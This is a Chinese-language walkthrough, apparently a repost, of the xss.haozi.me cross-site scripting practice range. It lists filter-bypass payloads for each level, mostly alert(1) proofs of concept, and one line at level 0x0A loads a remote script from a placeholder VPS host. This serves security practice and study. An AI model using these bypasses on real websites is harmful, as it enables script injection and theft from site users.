xss.haozi靶机

Posted bingtang123

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了xss.haozi靶机相关的知识,希望对你有一定的参考价值。


X00

<script>alert(1)</script>

技术图片


X01

</textarea><script>alert(1)</script><textarea>

技术图片

X02

"><script>alert(1)</script><"

技术图片

X03

技术图片

将()替换成空字符

<script>alert`1`</script>

使用反引号

技术图片

X04

技术图片

()和反引号都过滤

<svg><script>alert(1)</script>        进行html编码   <svg><script>alert&#40;1&#41;</script>

技术图片

X05

技术图片

-->替换成了笑脸

--!><script>alert(1)</script><--

技术图片

X06

技术图片

匹配auto和on开头加=的数据,>符号,替换为_

在等号前换行

onmousedown

=alert(1)

技术图片

X07

技术图片

过滤以<开头 以>结尾的字符串

<img src=1 onerror="alert(1)"

技术图片

X08

</style ><script>alert(1)</script><style>

技术图片

X09

https://www.segmentfault.com

技术图片

https://www.segmentfault.com"></script><script>alert(1)//

技术图片

X0A

https://www.segmentfault.com@xss.haozi.me/j.js

https://www.segmentfault.com@vps地址/xss.js

技术图片

X0B

技术图片

将输?的字符串转换成?写

<svg onload=alert(1)>

html编码

<svg onload=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

技术图片

X0c

<svg onload=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

技术图片

X0d

技术图片

//只能注释单行,利?换?逃逸注释,利?html的"-->"注释掉后?字符

换行

alert(1)

-->

技术图片

X0e

技术图片

未解决出来

X0f

技术图片
 
技术图片

‘);alert(1)//

技术图片
 

X10

alert(1)

技术图片

X11

技术图片

");alert(1)//

技术图片

x12

技术图片

将双引号进行了转义

");alert(1)//

技术图片

 

 

 

 

 

 

 

 



以上是关于xss.haozi靶机的主要内容,如果未能解决你的问题,请参考以下文章

靶机渗透HACKME: 1

靶机渗透HACKME: 1

靶机渗透HACKME: 1

靶机渗透lazysysadmin

靶机渗透billu_b0x

靶机DC-4